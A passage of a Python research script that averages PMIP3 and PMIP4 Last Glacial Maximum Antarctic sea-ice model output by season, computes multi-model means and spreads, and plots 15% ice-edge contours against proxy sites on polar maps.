if this is loveclim1 or 2\naug = LOVE2_sum_3.ALFEB.mean(dim='AX005')\nsep = LOVE2_sum_3.ALMAR.mean(dim='AX006')\nLOVE2_sum_3 = (aug + sep)/2\n\n\n\n# Multi model mean\nMMM_sum = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMinimum15%.nc',decode_times=False)\n\n#### Winter\n\n# data sets with preset variables\n\nCCSM4_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_win_3 = (CCSM4_win_3.S1A + CCSM4_win_3.S1B)/2\nGISS_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-GISS_lgm.nc',decode_times=False)\nGISS_win_3 = (GISS_win_3.S2A + GISS_win_3.S2B)/2\nGISS_win_3 = GISS_win_3.isel(LAT=(GISS_win_3.LAT > -70))\nMPI_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-MPI_lgm.nc',decode_times=False)\nMPI_win_3 = (MPI_win_3.S3A + MPI_win_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_win = xr.concat([CNRM_3.sel(time=(CNRM_3.time[8])), CNRM_3.sel(time=(CNRM_3.time[9]))], dim=\"time\")\nCNRM_3_win = CNRM_3_win.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_win = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[8])), FGOALS_3.sel(time=(FGOALS_3.time[9]))], dim=\"time\")\nFGOALS_3_win = FGOALS_3_win.mean(dim='time')\nFGOALS_3_win = FGOALS_3_win.isel(lat=(FGOALS_3_win.lat > -70))\nIPSL_3_win = xr.concat([IPSL_3.sel(time=(IPSL_3.time[7])), IPSL_3.sel(time=(IPSL_3.time[8]))], dim=\"time\")\nIPSL_3_win = IPSL_3_win.mean(dim='time')\nMIROC_3_win = xr.concat([MIROC_3.sel(time=(MIROC_3.time[8])), MIROC_3.sel(time=(MIROC_3.time[9]))], dim=\"time\")\nMIROC_3_win = MIROC_3_win.mean(dim='time')\nMRI_3_win = xr.concat([MRI_3.sel(time=(MRI_3.time[8])), MRI_3.sel(time=(MRI_3.time[9]))], dim=\"time\")\nMRI_3_win = MRI_3_win.mean(dim='time')\nMRI_3_win = MRI_3_win.isel(lat=(MRI_3_win.lat > -70))\nLOVE2_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcWINTER.nc',decode_times=False) # check if this is loveclim1 or 2\naug = LOVE2_win_3.ALAUG.mean(dim='AX005')\nsep = LOVE2_win_3.ALSEP.mean(dim='AX006')\nLOVE2_win_3 = (aug + sep)/2\n\n\n# Multi model mean winter\nMMM_win = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMaximum15%.nc',decode_times=False)\n\n# load in PMIP4 data\n\niLOVECLIM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/cresum18250_regrid.nc',decode_times=False)\nLOVEsic = iLOVECLIM.albq\nfeb = LOVEsic[1:2400:12]\nmar = LOVEsic[2:2400:12]\naug = LOVEsic[7:2400:12]\nsep = LOVEsic[8:2400:12]\nmar = mar.mean(dim='time')\nfeb = feb.mean(dim='time')\nsep = sep.mean(dim='time')\naug = aug.mean(dim='time')\nLOVEsummer = (mar+feb)/2\nLOVEwinter = (sep + aug)/2\nLOVEsummer = LOVEsummer * 100\nLOVEwinter = LOVEwinter * 100\n\n\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/AWI_PMIP4_siconca_regrid.nc',decode_times=False)\nMIROC = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MIROC_PMIP4_siconc_regrid.nc',decode_times=False)\nMPI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MPIPMIP4_siconc_regrid.nc',decode_times=False)\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nCCSM4UoT = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/siconc_SImon_UofT-CCSM4_lgm_r1i1p1f1_gn_110101-120012_regrid.nc',decode_times=False)\nIPSL = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/IPSLCM5A2_LGM_regrid.nc',decode_times=False)\n\n\n# datasets that need to be averaged over 2 month period\nAWI_winter = xr.concat([AWI.sel(time=(AWI.time[7::12])), AWI.sel(time=(AWI.time[8::12]))], dim=\"time\") # August September\nAWI_winter = AWI_winter.mean(dim='time')\nAWI_winter = AWI_winter.isel(lat=(AWI_winter.lat > -70))\nAWI_summer = xr.concat([AWI.sel(time=(AWI.time[1::12])), AWI.sel(time=(AWI.time[2::12]))], dim=\"time\") # Feb March\nAWI_summer = AWI_summer.mean(dim='time')\n\nMIROC_winter = xr.concat([MIROC.sel(time=(MIROC.time[8::12])), MIROC.sel(time=(MIROC.time[9::12]))], dim=\"time\") # Sep october\nMIROC_winter = MIROC_winter.mean(dim='time')\nMIROC_summer = xr.concat([MIROC.sel(time=(MIROC.time[1::12])), MIROC.sel(time=(MIROC.time[2::12]))], dim=\"time\") # Feb march\nMIROC_summer = MIROC_summer.mean(dim='time')\n\nMPI_winter = xr.concat([MPI.sel(time=(MPI.time[8::12])), MPI.sel(time=(MPI.time[9::12]))], dim=\"time\")\nMPI_winter = MPI_winter.mean(dim='time')\nMPI_summer = xr.concat([MPI.sel(time=(MPI.time[1::12])), MPI.sel(time=(MPI.time[2::12]))], dim=\"time\")\nMPI_summer = MPI_summer.mean(dim='time')\n\nCESM12_winter = xr.concat([CESM12.sel(time=(CESM12.time[7])), CESM12.sel(time=(CESM12.time[8]))], dim=\"time\")\nCESM12_winter = CESM12_winter.mean(dim='time')\nCESM12_summer = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12_summer = CESM12_summer.mean(dim='time')\n\nCCSM4UoT_winter = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[8::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[9::12]))], dim=\"time\")\nCCSM4UoT_winter = CCSM4UoT_winter.mean(dim='time')\nCCSM4UoT_summer = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[2::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[3::12]))], dim=\"time\")\nCCSM4UoT_summer = CCSM4UoT_summer.mean(dim='time')\n\nIPSL_winter = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[7])), IPSL.sel(time_counter=(IPSL.time_counter[8]))], dim=\"time_counter\") # August September\nIPSL_winter = IPSL_winter.mean(dim='time_counter')\nIPSL_winter = IPSL_winter.isel(lat=(IPSL_winter.lat > -70))\nIPSL_summer = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[1])), IPSL.sel(time_counter=(IPSL.time_counter[2]))], dim=\"time_counter\") # Feb March\nIPSL_summer = IPSL_summer.mean(dim='time_counter')\n\n# proxy data points for Summer\nnoSSIlat = [-57.02,-63.08,-60.22,-61.24,-56.9,-57.83,-56.06,-54.91,-62.16,-58.68,-59.97,-59.02,-45.1,-53.93,-52.6,-53.55,-55.55,-55.14,-56.74,-59.79,-59.79,-60.3,-59.05,-58.72,-54.64,-47.9,-50.25,-54.91,-56.84,-55.97,-59.23,-55.19,-57.57,-58.85,-53.05,-46.51,-51.7,-44.15,-50.4,-49.01,-48.23,-37.27,-50.95,-42.88,-53.07,-53.88,-43.17,-53.18,-52.63,-54.91,-53.63,-52.59,-51.98,-51.83,-53.66,-53.17,-53.18,-53.18,-53.19,-50.16,-49.98,-44.96,-46.94,-48.9,-46.6,-42.87,-55.37,-42.52,-43.22,-47.54,-52.02,-45.73,-43.7,-49.1,-43.85,-41.86,-49.57,-56.57,-44.56,-46.14,-58.99,-50.69,-53.23,-51.88,-42.88,-51.91,-55.01,-43.7,-49,-38,-43.49,-54.48,-44.98,-52.2,-38.75,-50.47,-50.32,-48.89,-55.33,-51.06,-50.37,-37.8,-55,-54.91,-38.54,-46.06,-46.02,-55.95,-44.88,-52.9,-51.01,-55.07,-53.04,-53.5,-52.48,-53.44,-45.06,-52.94,-47.77,-45.01,-48.86,-48.03,-54.19,-56.38,-60.39,-56.67]\nnoSSIlon = [-160.09,-135.12,-127.03,-116.05,-115.24,-115.21,-115.06,-114.7,-109.09,-108.8,-101.32,-99.76,-57.95,-48.04,-46.88,-45.29,-45.02,-44.11,-42.97,-42.68,-39.6,-36.65,-35.61,-33.04,-23.95,-23.7,-23.24,-22.71,-22.32,-22.22,-19.73,-18.61,-17.1,-16.65,-16.45,-15.33,-15.3,-14.23,-14.08,-12.7,-11.04,-10.1,-7.51,-6.02,-4.99,-4.93,-4.06,-0.35,-0.13,3.31,3.86,4.48,4.52,4.81,5.1,5.11,5.13,5.13,5.33,5.72,5.87,5.97,6.26,6.71,7.63,8.92,9.98,11.67,11.74,15.36,20.47,25.65,25.73,27.38,27.6,28.54,30.02,34.18,34.79,35.9,37.63,40.13,40.8,41.65,42.35,42.88,45.01,45.06,45.21,51.18,51.32,53.05,53.28,54.47,59.3,59.58,61.2,61.66,65.47,67.72,68.39,71.53,73.26,73.84,79.87,90.09,96.43,104.95,106.52,109.85,109.99,110.02,110.05,111.33,114.09,114.26,114.37,116.99,123.1,125.98,126.02,126.13,144.79,145.3,157.53,160.23]\nSSIlat = [-50.87,-53.80,-54.09,-62.49,-63.65,-64.67]\nSSIlon = [-9.87,-8.22,-0.35,95.89,101.15,119.51]\nmaybeSSIlat = [-59.79,-60.30,-53.88,-53.18,-53.63,-53.17,-52.02]\nmaybeSSIlon = [-39.60,-36.65,-4.93,-0.35, 3.86, 5.11,20.47]\n\n# proxy data points for winter\nnoWSIlat = [-58.55,-59.70,-60.87,-59.04,-55.53,-60.22,-54.22,-56.90,-56.06,-55.16,-54.91,-58.68,-52.81,-59.97,-59.02,-45.10,-56.84,-55.97,-46.51,-44.15,-50.40,-49.01,-48.23,-37.27,-42.88,-43.17,-50.16,-44.96,-46.94,-48.90,-46.60,-42.87,-42.52,-43.22,-47.54,-45.73,-43.70,-43.85,-41.86,-44.56,-46.14,-42.88,-43.70,-49.00,-38.00,-43.49,-44.98,-38.75,-48.89,-37.80,-38.54,-46.06,-46.02,-44.88,-45.06,-52.94,-47.77,-45.01,-48.86,-48.03]\nnoWSIlon = [-172.70,-171.36,-169.55,-158.36,-156.14,-127.03,-125.43,-115.24,-115.06,-114.79,-114.70,-108.80,-107.81,-101.32,-99.76,-57.95,-22.32,-22.22,-15.33,-14.23,-14.08,-12.70,-11.04,-10.10,-6.02,-4.06,5.72,5.97,6.26,6.71,7.63,8.92,11.67,11.74,15.36,25.65,25.73,27.60,28.54,34.79,35.90,42.35,45.06,45.21,51.18,51.32,53.28,59.30,61.66,71.53,79.87,90.09,96.43,106.52,114.37,116.99,123.10,125.98,126.02,126.13]\nWSIlat = [-63.69,-61.94,-57.02,-57.20,-57.56,-61.01,-63.08,-62.03,-61.24,-57.83,-56.15,-59.21,-62.16,-53.93,-52.60,-53.55,-55.55,-55.14,-56.74,-59.79,-59.79,-60.30,-59.05,-58.72,-54.64,-47.90,-50.25,-54.91,-59.23,-55.19,-57.57,-58.85,-53.05,-51.70,-50.87,-53.80,-50.95,-53.07,-53.88,-54.09,-53.18,-52.63,-54.91,-53.63,-52.59,-51.98,-51.83,-53.66,-53.17,-53.18,-53.18,-53.19,-49.98,-55.37,-52.02,-49.10,-49.57,-56.57,-58.99,-50.69,-53.23,-51.88,-51.91,-55.01,-54.48,-52.20,-50.47,-50.32,-55.33,-51.06,-50.37,-55.00,-54.91,-62.49,-63.65,-55.95,-52.90,-51.01,-55.07,-53.04,-53.50,-52.48,-53.44,-64.67,-54.19,-56.38,-59.62,-60.39,-56.67]\nWSIlon = [-169.07,-160.12,-160.09,-151.61,-151.22,-139.46,-135.12,-116.12,-116.05,-115.21,-115.13,-114.89,-109.09,-48.04,-46.88,-45.29,-45.02,-44.11,-42.97,-42.68,-39.60,-36.65,-35.61,-33.04,-23.95,-23.70,-23.24,-22.71,-19.73,-18.61,-17.10,-16.65,-16.45,-15.30,-9.87,-8.22,-7.51,-4.99,-4.93,-0.35,-0.35,-0.13,3.31,3.86,4.48,4.52,4.81,5.10,5.11,5.13,5.13,5.33,5.87,9.98,20.47,27.38,30.02,34.18,37.63,40.13,40.80,41.65,42.88,45.01,53.05,54.47,59.58,61.20,65.47,67.72,68.39,73.26,73.84,95.89,101.15,104.95,109.85,109.99,110.02,110.05,111.33,114.09,114.26,119.51,144.79,145.30,155.24,157.53,160.23]\nmaybeWSIlat = [-59.04,-55.53,-56.84,-55.97,-50.40,-50.16,-47.45,-43.70,-49.00]\nmaybeWSIlon = [-158.36,-156.14,-22.32,-22.22,-14.08,5.72,15.36,45.06,45.21]\n\n# proxy line from\nproxyline = pd.read_excel('~/Downloads/Table_LGM_SI_Zenedo (1).xlsx',engine=\"openpyxl\")\nWSI = proxyline[[\"Longitude\", \"Latitude WSI\"]]\nSSI = proxyline[[\"Longitude\", \"Latitude SSI\"]]\nWSI = WSI[1:361]\nSSI = SSI[1:361]\nWSI = WSI.rename(columns={\"Latitude WSI\": \"Latitude\"})\nSSI = SSI.rename(columns={\"Latitude SSI\": \"Latitude\"})\n\n\nnrows=4\nncols=4\nextent = [-180, 180, -90, -30]\n\nfig, ax = plt.subplots(nrows=nrows,ncols=ncols,\n subplot_kw={'projection': ccrs.SouthPolarStereo()},\n figsize=(15.5,16))\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nax=ax.flatten()\ntheta = np.linspace(0, 2*np.pi, 100)\ncenter, radius = [0.5, 0.5], 0.5\nverts = np.vstack([np.sin(theta), np.cos(theta)]).T\ncircle = mpath.Path(verts * radius + center)\n\n#setting up first three rows\nfor n in range(10):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n ax[n].coastlines(zorder=4)\n\n# Adding summer proxy data\nfor n in range(0,10,2):\n ax[n].plot([noSSIlon], [noSSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([SSIlon], [SSIlat],color='blue', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeSSIlon], [maybeSSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n# adding winter proxy data\nfor n in range(1,10,2):\n ax[n].plot([noWSIlon], [noWSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([WSIlon], [WSIlat],color='blue', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeWSIlon], [maybeWSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n# because skipping bottom right, setting up fourth row\nfor n in range(12,14):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n ax[n].coastlines(zorder=4)\n\nfor n in range(12,14):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n ax[n].coastlines(zorder=4)\n\n# Adding summer proxy data\nfor n in range(12,13):\n ax[n].plot([noSSIlon], [noSSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([SSIlon], [SSIlat],color='blue', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeSSIlon], [maybeSSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n# adding winter proxy data\nfor n in range(13,14):\n ax[n].plot([noWSIlon], [noWSIlat],color='red', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([WSIlon], [WSIlat],color='blue', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n ax[n].plot([maybeWSIlon], [maybeWSIlat],color='black', marker='o',markersize=1.5,transform=ccrs.PlateCarree())\n\n\n# PMIP3\n# Austral summer all models\n# could make this cleaner and do loops but I just need to get it done at this point\n\nax[0].contour(CCSM4_sum_3.LON,CCSM4_sum_3.LAT,CCSM4_sum_3,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(GISS_sum_3.LON,GISS_sum_3.LAT,GISS_sum_3,colors=['#17becf'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(MPI_sum_3.LON,MPI_sum_3.LAT,MPI_sum_3,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nax[0].contour(CNRM_3_sum.lon,CNRM_3_sum.lat,CNRM_3_sum.sic,colors=['black'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5,zorder=6)\nax[0].contour(FGOALS_3_sum.lon,FGOALS_3_sum.lat,FGOALS_3_sum.sic,colors=['#e377c2'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(IPSL_3_sum.lon,IPSL_3_sum.lat,IPSL_3_sum.sic,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(MIROC_3_sum.lon,MIROC_3_sum.lat,MIROC_3_sum.sic,colors=['#9467bd'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[0].contour(MRI_3_sum.lon,MRI_3_sum.lat,MRI_3_sum.sic,colors=['#1f77b4'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n\n# austral summer MMM\n\n# believe I can do this using LOVE2_sum_3 and CNRM_3_sum.sic for example but just sticking with what I know works and can change after\nMMM_CCSM4 = (MMM_sum.CCSM4R2 + MMM_sum.CCSM4R1)/2\nMMM_GISS = (MMM_sum.GISSP150 + MMM_sum.GISSP151)/2\nMMM_MPI = (MMM_sum.MPIP1 + MMM_sum.MPIP2)/2\nMMM_sum['CCSM4'] = MMM_CCSM4\nMMM_sum['GISS'] = MMM_GISS\nMMM_sum['MPI'] = MMM_MPI\nMMM_sum = MMM_sum.drop_vars('CCSM4R1')\nMMM_sum = MMM_sum.drop_vars('CCSM4R2')\nMMM_sum = MMM_sum.drop_vars('GISSP150')\nMMM_sum = MMM_sum.drop_vars('GISSP151')\nMMM_sum = MMM_sum.drop_vars('MPIP1')\nMMM_sum = MMM_sum.drop_vars('MPIP2')\nMMM_LOVE1_sum_3 = LOVE1_sum_3*100\nMMM_LOVE2_sum_3 = LOVE2_sum_3*100\n\n# multi model mean\nMMM_sum_mean = (MMM_sum.CNRM + MMM_sum.FGOALS + MMM_sum.IPSL + MMM_sum.MIROC + MMM_sum.MRI + MMM_sum.CCSM4 + MMM_sum.MPI + MMM_sum.GISS)/8\n\n# calculating STD\nvar1=(MMM_sum.CCSM4-MMM_sum_mean)**2\nvar2=(MMM_sum.GISS-MMM_sum_mean)**2\nvar3=(MMM_sum.MPI-MMM_sum_mean)**2\nvar4=(MMM_sum.CNRM-MMM_sum_mean)**2\nvar5=(MMM_sum.FGOALS-MMM_sum_mean)**2\nvar6=(MMM_sum.IPSL-MMM_sum_mean)**2\nvar7=(MMM_sum.MIROC-MMM_sum_mean)**2\nvar8=(MMM_sum.MRI-MMM_sum_mean)**2\n# var9=(MMM_LOVE1_sum_3 -MMM_sum_mean)**2\n# var10=(MMM_LOVE2_sum_3 -MMM_sum_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD2=(MMM_sum_mean+STD)\nSTD3=(MMM_sum_mean-STD)\n\n# plotting\nax[4].contour(MMM_sum_mean.LON,MMM_sum_mean.LAT,MMM_sum_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[4].contour(STD2.LON,STD2.LAT,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[4].contour(STD3.LON,STD3.LAT,STD3,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n# austral winter all models\nax[1].contour(CCSM4_win_3.LON,CCSM4_win_3.LAT,CCSM4_win_3,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(GISS_win_3.LON,GISS_win_3.LAT,GISS_win_3,colors=['#17becf'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(MPI_win_3.LON,MPI_win_3.LAT,MPI_win_3,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nax[1].contour(CNRM_3_win.lon,CNRM_3_win.lat,CNRM_3_win.sic,colors=['black'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5,zorder=6)\nax[1].contour(FGOALS_3_win.lon,FGOALS_3_win.lat,FGOALS_3_win.sic,colors=['#e377c2'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(IPSL_3_win.lon,IPSL_3_win.lat,IPSL_3_win.sic,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(MIROC_3_win.lon,MIROC_3_win.lat,MIROC_3_win.sic,colors=['#9467bd'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[1].contour(MRI_3_win.lon,MRI_3_win.lat,MRI_3_win.sic,colors=['#1f77b4'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n\n# austral winter MMM\nMMM_CCSM4 = (MMM_win.CCSM4R2 + MMM_win.CCSM4R1)/2\nMMM_GISS = (MMM_win.GISSP150 + MMM_win.GISSP151)/2\nMMM_MPI = (MMM_win.MPIP1 + MMM_win.MPIP2)/2\nMMM_win['CCSM4'] = MMM_CCSM4\nMMM_win['GISS'] = MMM_GISS\nMMM_win['MPI'] = MMM_MPI\nMMM_win = MMM_win.drop_vars('CCSM4R1')\nMMM_win = MMM_win.drop_vars('CCSM4R2')\nMMM_win = MMM_win.drop_vars('GISSP150')\nMMM_win = MMM_win.drop_vars('GISSP151')\nMMM_win = MMM_win.drop_vars('MPIP1')\nMMM_win = MMM_win.drop_vars('MPIP2')\nMMM_LOVE1_win_3 = LOVE1_win_3*100\nMMM_LOVE2_win_3 = LOVE2_win_3*100\n\n# multi model mean\nMMM_win_mean = (MMM_win.CNRM + MMM_win.FGOALS + MMM_win.IPSL + MMM_win.MIROC + MMM_win.MRI + MMM_win.CCSM4 + MMM_win.MPI + MMM_win.GISS)/8\n\n# calculating STD\nvar1=(MMM_win.CCSM4-MMM_win_mean)**2\nvar2=(MMM_win.GISS-MMM_win_mean)**2\nvar3=(MMM_win.MPI-MMM_win_mean)**2\nvar4=(MMM_win.CNRM-MMM_win_mean)**2\nvar5=(MMM_win.FGOALS-MMM_win_mean)**2\nvar6=(MMM_win.IPSL-MMM_win_mean)**2\nvar7=(MMM_win.MIROC-MMM_win_mean)**2\nvar8=(MMM_win.MRI-MMM_win_mean)**2\n# var9=(MMM_LOVE1_win_3 -MMM_win_mean)**2\n# var10=(MMM_LOVE2_win_3 -MMM_win_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD4=(MMM_win_mean+STD)\nSTD5=(MMM_win_mean-STD)\n\n# plotting\nax[5].contour(MMM_win_mean.LON,MMM_win_mean.LAT,MMM_win_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[5].contour(STD4.LON,STD4.LAT,STD4,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[5].contour(STD5.LON,STD5.LAT,STD5,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n# LOVECLIM PMIP3\n\n# summer all models\nax[8].contour(LOVE1_sum_3.LON,LOVE1_sum_3.LAT,LOVE1_sum_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dotted'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[8].contour(LOVE2_sum_3.LON,LOVE2_sum_3.LAT,LOVE2_sum_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dashdot'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n# MMM summer\n\nMMM = (MMM_LOVE2_sum_3 + MMM_LOVE1_sum_3)/2\nvar1 = (MMM_LOVE1_sum_3 - MMM)**2\nvar2 = (MMM_LOVE2_sum_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nax[12].contour(MMM.LON,MMM.LAT,MMM,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[12].contour(STD1.LON,STD1.LAT,STD1,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[12].contour(STD1.LON,STD1.LAT,STD1,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n\n# winter all models\nax[9].contour(LOVE1_win_3.LON,LOVE1_win_3.LAT,LOVE1_win_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dotted'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[9].contour(LOVE2_win_3.LON,LOVE2_win_3.LAT,LOVE2_win_3,colors=['#F7DC6F'],levels=[0.15],linestyles=['dashdot'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\n# MMM winter\nMMM = (MMM_LOVE1_win_3 + MMM_LOVE2_win_3 )/2\nvar1 = (MMM_LOVE1_win_3 - MMM)**2\nvar2 = (MMM_LOVE2_win_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nax[13].contour(MMM.LON,MMM.LAT,MMM,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[13].contour(STD1.LON,STD1.LAT,STD1,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[13].contour(STD1.LON,STD1.LAT,STD1,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n#PMIP 4 summer\n\nax[2].contour(CCSM4UoT_summer.lon,CCSM4UoT_summer.lat,CCSM4UoT_summer.siconc,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(CESM12_summer.lon,CESM12_summer.lat,CESM12_summer.IFRAC*100,colors=['#8c564b'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(AWI_summer.lon,AWI_summer.lat,AWI_summer.siconca,colors=['#B8255F'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(MPI_summer.lon,MPI_summer.lat,MPI_summer.siconc,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(MIROC_summer.lon,MIROC_summer.lat,MIROC_summer.siconc,colors=['#9467bd'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(IPSL_summer.lon,IPSL_summer.lat,IPSL_summer.fract_sic*100,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[2].contour(LOVEsummer.lon,LOVEsummer.lat,LOVEsummer,colors=['#F7DC6F'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nMMM_summer_mean = (CCSM4UoT_summer.siconc+CESM12_summer.IFRAC*100+LOVEsummer+AWI_summer.siconca+MPI_summer.siconc+MIROC_summer.siconc+IPSL_summer.fract_sic*100)/7\nvar1=(CCSM4UoT_summer.siconc-MMM_summer_mean)**2\nvar2=(CESM12_summer.IFRAC*100-MMM_summer_mean)**2\nvar3=(AWI_summer.siconca-MMM_summer_mean)**2\nvar4=(MPI_summer.siconc-MMM_summer_mean)**2\nvar5=(MIROC_summer.siconc-MMM_summer_mean)**2\nvar6=(IPSL_summer.fract_sic*100-MMM_summer_mean)**2\nvar7=(LOVEsummer-MMM_summer_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_summer_mean+STD)\nSTD3=(MMM_summer_mean-STD)\n\nax[6].contour(MMM_summer_mean.lon,MMM_summer_mean.lat,MMM_summer_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[6].contour(STD2.lon,STD2.lat,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[6].contour(STD3.lon,STD3.lat,STD3,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n# PMIP4 winter\n\nax[3].contour(CCSM4UoT_winter.lon,CCSM4UoT_winter.lat,CCSM4UoT_winter.siconc,colors=['#ff7f0e'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(CESM12_winter.lon,CESM12_winter.lat,CESM12_winter.IFRAC*100,colors=['#8c564b'],linestyles=['solid'],levels=[15], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(AWI_winter.lon,AWI_winter.lat,AWI_winter.siconca,colors=['#B8255F'],levels=[15],linestyles=['solid'], 